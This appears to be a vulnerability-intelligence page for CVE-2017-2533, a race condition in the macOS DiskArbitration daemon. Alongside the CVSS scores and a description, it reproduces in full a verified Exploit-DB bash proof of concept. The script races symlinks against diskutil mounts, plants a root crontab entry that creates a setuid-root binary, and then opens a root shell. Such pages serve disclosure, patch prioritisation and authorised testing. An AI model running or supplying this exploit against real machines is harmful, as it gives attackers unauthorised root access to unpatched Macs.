VIR Vulnerability Intelligence Relay

CVE-2017-2533

high
Published 2017-05-22 ยท Modified 2026-05-13
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
7.0
CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.0

Description

An issue was discovered in certain Apple products. macOS before 10.12.5 is affected. The issue involves the "DiskArbitration" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.

Predictions

Exploit likelihood
69%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42146 local macos verified bash ยท 2 KB
phoenhex ยท 2017-06-09

Apple macOS - Disk Arbitration Daemon Race Condition

bash exploit Source: Exploit-DB 
#!/bin/bash

# Sources: 
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc

if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1

TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR

cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1

race_link() {
  mkdir -p mounts

  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

if df -h | grep $DISK >/dev/null; then
  echo 2>&1 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount

echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"

OS impact
macos macOS Affected 1 release
VersionStatusFixed in
โ€” Affected โ€”

References

CWEs

CWE-362

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.